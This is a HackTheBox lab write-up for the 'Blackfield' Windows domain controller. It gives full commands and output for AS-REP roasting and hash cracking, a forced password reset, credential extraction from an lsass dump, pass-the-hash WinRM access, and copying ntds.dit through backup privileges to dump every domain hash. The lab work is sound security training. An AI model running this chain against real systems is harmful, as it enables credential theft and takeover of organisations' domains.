WriteupsHTB — Blackfield
ADHardWindows
HTB — Blackfield
ASREPRoasting yields crackable hash. ForceChangePassword on account via BloodHound. Volatility lsass dump reveals backup operator for DCSync.
January 23, 2025HackTheBox
#AD#ASREPRoasting#BloodHound#DCSync
nmap
sh
Nmap scan report for 10.10.10.192
Host is up (0.023s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-23 14:21:21Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m02s
| smb2-time:
| date: 2025-01-23T14:21:31
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 18.87 ms 10.10.14.1
2 18.92 ms 10.10.10.192445
sh
445/tcp open microsoft-ds?- listed shares as 'guest' account
sh
smbclient -L \\10.10.10.192 -U 'guest'
Password for [WORKGROUP\guest]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
cd do_connect: Connection to 10.10.10.192 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup availablesh
nxc smb 10.10.10.192 -u 'guest' -p '' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\guest:
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL Logon server share profile$
- this has valid usernames
sh
mbclient \\\\10.10.10.192\\profiles$ -U 'guest'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 12:47:12 2020
.. D 0 Wed Jun 3 12:47:12 2020
AAlleni D 0 Wed Jun 3 12:47:11 2020
ABarteski D 0 Wed Jun 3 12:47:11 2020
ABekesz D 0 Wed Jun 3 12:47:11 2020
ABenzies D 0 Wed Jun 3 12:47:11 2020
ABiemiller D 0 Wed Jun 3 12:47:11 2020
AChampken D 0 Wed Jun 3 12:47:11 2020
ACheretei D 0 Wed Jun 3 12:47:11 2020
ACsonaki D 0 Wed Jun 3 12:47:11 2020
AHigchens D 0 Wed Jun 3 12:47:11 2020
AJaquemai D 0 Wed Jun 3 12:47:11 2020
AKlado D 0 Wed Jun 3 12:47:11 2020
AKoffenburger D 0 Wed Jun 3 12:47:11 2020
AKollolli D 0 Wed Jun 3 12:47:11 2020
AKruppe D 0 Wed Jun 3 12:47:11 2020asreproast
sh
GetNPUsers.py BLACKFIELD.LOCAL/ -dc-ip 10.10.10.192 -no-pass -usersfile users.txt
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$support@BLACKFIELD.LOCAL:998138e7...$af9e789596efe72c4783479d772205b7c35b93dd0de967410d374f859a9a2343ee5d48d84c828248860c42b81fc2848322dbac618ffef61ea56f2ce2c026f9971cc46803bc7960ff405bab2b8484d272e860ebc9dd24782873359632dbe0c3cbd9b4d0ccaf7a0f51e1761765cae23d3e66616e3b610521f0f628d19ff019c75571e2a6b3acd4441c593807229cbd69249c16ae668d59a7b607bbcdb2421f96a4e373e7766f6269edc84423baa78df7225fa9a7e3ab9ffa76345524bc9f369f46c33ce185a61c2a267f6d2bfa0acb1ad45d3971dec27761548a710484bc84d5e6dba9af46091d90ffb765d18c109d92fd5b0af30e
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH setsh
hashcat -m 18200 support_asrep.txt /usr/share/wordlists/rockyou.txt
$krb5asrep$23$support@BLACKFIELD.LOCAL:998138e7...$af9e789596efe72c4783479d772205b7c35b93dd0de967410d374f859a9a2343ee5d48d84c828248860c42b81fc2848322dbac618ffef61ea56f2ce2c026f9971cc46803bc7960ff405bab2b8484d272e860ebc9dd24782873359632dbe0c3cbd9b4d0ccaf7a0f51e1761765cae23d3e66616e3b610521f0f628d19ff019c75571e2a6b3acd4441c593807229cbd69249c16ae668d59a7b607bbcdb2421f96a4e373e7766f6269edc84423baa78df7225fa9a7e3ab9ffa76345524bc9f369f46c33ce185a61c2a267f6d2bfa0acb1ad45d3971dec27761548a710484bc84d5e6dba9af46091d90ffb765d18c109d92fd5b0af30e:#00^BlackKnightcreds
support:#00^BlackKnight
sh
nxc smb 10.10.10.192 -u support -p '#00^BlackKnight' --users
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.10.10.192 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.192 445 DC01 Administrator 2020-02-23 18:09:53 0 Built-in account for administering the computer/domain
SMB 10.10.10.192 445 DC01 Guest 2020-06-03 16:18:28 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.192 445 DC01 krbtgt 2020-02-23 18:08:31 0 Key Distribution Center Service Account
SMB 10.10.10.192 445 DC01 audit2020 2020-09-21 22:35:06 0
SMB 10.10.10.192 445 DC01 support 2020-02-23 17:53:23 0 bloodhound
sh
bloodhound-python -u 'support' -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all
zip -r blackfield.zip *.jsonForceChangePassword
sh
net rpc password "audit2020" "Password123" -U "blackfield"/"support"%"#00^BlackKnight" -S "10.10.10.192"sh
nxc smb 10.10.10.192 -u audit2020 -p 'Password123'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123 sh
nxc smb 10.10.10.192 -u audit2020 -p 'Password123' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password123
SMB 10.10.10.192 445 DC01 [*] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share forensic share
sh
smbclient \\\\10.10.10.192\\forensic -U 'audit2020%Password123'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020lsass.dmp
sh
ls
lsass.DMP
file lsass.DMP
lsass.DMP: Mini DuMP crash report, 16 streams, Sun Feb 23 18:02:01 2020, 0x421826 type
pypykatz lsa minidump ./lsass.DMP
INFO:pypykatz:Parsing file ./lsass.DMP
FILE: ======== ./lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1...
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hexsh
nxc smb 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1...
nxc winrm 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'
WINRM 10.10.10.192 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1... (Pwn3d!)evil-winrm
sh
evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1...'users.txt
sh
*Evil-WinRM* PS C:\users\svc_backup\Desktop> cat user.txt
3920bb31...notes.txt
sh
*Evil-WinRM* PS C:\> cat notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)priv esc as svc_backup
sh
*Evil-WinRM* PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
test.dsh
sh
set context persistent nowriters
add volume c: alias test
create
expose %test% z:sh
*Evil-WinRM* PS C:\users\svc_backup> upload /home/sake/htb-labs/Blackfield/test.dshsh
*Evil-WinRM* PS C:\users\svc_backup> diskshadow /s test.dshsh
*Evil-WinRM* PS C:\users\svc_backup> robocopy /b z:\windows\ntds . ntds.ditsh
*Evil-WinRM* PS C:\> mkdir tempsh
*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM SYSTEM.SAV
*Evil-WinRM* PS C:\temp> reg save HKLM\SAM SAM.SAVsh
*Evil-WinRM* PS C:\temp> download SAM.SAV
*Evil-WinRM* PS C:\temp> download SYSTEM.SAV
*Evil-WinRM* PS C:\users\svc_backup> download ntds.ditsh
secretsdump.py -ntds ntds.dit -system SYSTEM.SAV -hashes lmhash:nthash LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3f...
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435...:184fb5e5...:::
Guest:501:aad3b435...:31d6cfe0...:::
DC01$:1000:aad3b435...:62470ed8...:::
krbtgt:502:aad3b435...:d3c02561...:::
audit2020:1103:aad3b435...:600a406c...:::
support:1104:aad3b435...:cead107b...:::winrm as administrator
sh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629...Up next
EasyJan 2025
HTB — Support
Custom .NET info collector binary contains obfuscated LDAP password. GenericAll on DC via Resource-Based Constrained Delegation for Domain Admin.
Read writeup
MediumJan 2025
HTB — Shibboleth
IPMI 2.0 cipher 0 authentication bypass via RAKP attack dumps password hash. MariaDB CVE-2021-27928 RCE and Zabbix for lateral movement.
Read writeup
MediumJan 2025
HTB — BigBang
WordPress BuddyForms plugin SSRF for local file read. Grafana SQLite injection for credentials. Telescope log viewer arbitrary file read for root key.
Read writeup